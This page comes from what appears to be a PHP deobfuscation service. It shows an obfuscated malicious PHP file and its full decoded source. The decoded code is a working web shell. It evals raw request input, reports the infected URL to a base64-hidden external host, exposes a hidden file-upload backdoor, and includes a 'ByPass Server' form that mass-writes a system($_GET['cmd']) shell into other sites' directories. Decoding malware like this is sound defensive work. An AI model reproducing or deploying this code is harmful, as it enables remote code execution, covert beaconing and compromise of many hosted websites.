Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$O0O000="PXTSQyGCHwdZEKFOkLiaJjzoxVghuNfmMBRpelIrAcsbvntqUYWDARqXiTgvVQsKUnCzFSBxEuobNZckD..
Decoded Output download
?>b'<?php
eval(\'?>\'.file_get_contents(\'php://input\'));
$k3yw = base64_decode(\'aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw\');
$cur = \'http://\' . $_SERVER[\'HTTP_HOST\'] . $_SERVER[\'REQUEST_URI\'];
$data = array(\'file_url\' => $cur);
$options = array(
\'http\' => array(
\'method\' => \'POST\',
\'header\' => \'Content-type: application/x-www-form-urlencoded\',
\'content\' => http_build_query($data),
),
);
$context = stream_context_create($options);
$result = file_get_contents($k3yw, false, $context);
if ( isset($_GET[\'MA\']) )
{
echo \'<center><b>\'.php_uname().\'<br></b><b><br><br>\'.\'\'.\'<br></b>\';
echo \'<form action="" method="post" enctype="multipart/form-data" name="b4b4" id="b4b4">\';
echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\';
echo \'<a href="#">Hello Dady</a>\';
if( $_POST[\'_upl\'] == "Upload" ) {
if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'<b>Done</b><br><br><a href="./\' . $_FILES[\'file\'][\'name\'] . \'">\' . $_FILES[\'file\'][\'name\'] . \'</a>\'; }
else { echo \'<b>Not Upload File !</b><br><br>\'; }
}
exit;
}
if ($_SERVER[\'REQUEST_METHOD\'] === \'POST\') {
$sites = $_POST[\'sites\'];
$by1 = $_POST[\'by1\'];
$by2 = $_POST[\'by2\'];
$file = $_POST[\'file\'];
$directories = explode("
", $sites);
foreach ($directories as $directory) {
$directory = trim($directory);
if (!empty($directory)) {
$shell = "PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=";
$decodedShell = base64_decode($shell);
$command = "echo \'{$decodedShell}\' > \'{$by1}{$directory}{$by2}/{$file}\'";
exec($command);
echo $directory . "/" . $file . "<br>";
}
}
}
?>
<!DOCTYPE html>
<html>
<head>
<title>ByPass Server</title>
</head>
<body><center>
<h1>ByPass Server ( 2023 )</h1>
<form method="post">
<textarea name="sites" rows="5" cols="40" placeholder="Domians"></textarea>
<br>
<input type="text" name="by1" placeholder="/home/">
<br>
<input type="text" name="by2" placeholder="/public_html/">
<br>
<input type="text" name="file" placeholder="XxX.php">
<br>
<input type="submit" value="RuN">
</form>
<br>
<h2>Telegram : @public_html | Email : [email protected]</h2>
</body></center>
</html>'
Did this file decode correctly?
Original Code
$O0O000="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";
eval('?>'.base64_decode(strtr(substr($O0O000 ,52*2),substr($O0O000,52,52),substr($O0O000,0,52))));
Function Calls
strtr | 1 |
substr | 3 |
base64_decode | 1 |
Stats
MD5 | 178806055b3767f3faec06704e0a17ef |
Eval Count | 1 |
Decode Time | 39 ms |